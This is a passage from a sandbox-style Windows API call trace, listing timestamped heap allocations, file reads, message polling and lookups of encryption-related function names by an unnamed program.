Size=0x10) returned 0x9bd8a0 [0170.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0170.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0170.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0170.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0170.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0170.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.578] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0170.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0170.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0170.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0170.579] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0170.579] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0170.579] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0170.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0170.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0170.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0170.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0170.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0170.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0170.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0170.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0170.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0170.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0170.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0170.580] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0170.580] ReadFile (in: hFile=0x138, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0xa915, lpOverlapped=0x0) returned 1 [0170.597] ReadFile (in: hFile=0x138, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0170.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0170.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0170.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa915) returned 0xa7b010 [0170.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0170.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0170.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0170.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0170.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0170.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa915) returned 0x9d5188 [0170.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7b010 | out: hHeap=0x8a0000) returned 1 [0170.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.601] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0170.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0170.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0170.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0170.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0170.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa915) returned 0xa7b010 [0170.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7b010 | out: hHeap=0x8a0000) returned 1 [0170.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0170.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0170.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0170.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.601] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0170.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0170.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0170.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0170.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0170.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0170.602] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0170.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0170.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0170.602] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0170.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0170.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0170.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa915) returned 0xa7b010 [0170.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0170.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0170.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0170.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0170.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0170.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0170.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0170.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa915) returned 0x9dfaa8 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0170.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0170.605] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0170.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0170.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0170.606] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0170.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0170.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0170.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0170.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0170.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0170.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0170.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0170.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0170.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0170.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0170.606] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0170.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0170.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2718 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0170.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0170.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0170.607] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0170.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0170.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0170.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0170.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0170.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0170.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0170.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0170.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0170.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0170.608] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0170.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0170.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0170.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0170.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0170.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0170.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0170.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0170.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0170.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0170.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0170.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0170.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0170.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0170.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0170.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0170.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0170.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0170.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0170.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0170.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0170.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0170.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0170.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0170.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.610] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0170.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0170.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0170.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0170.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0170.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0170.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0170.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0170.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0170.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0170.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0170.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0170.611] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0170.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0170.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0170.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0170.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0170.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0170.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0170.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0170.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 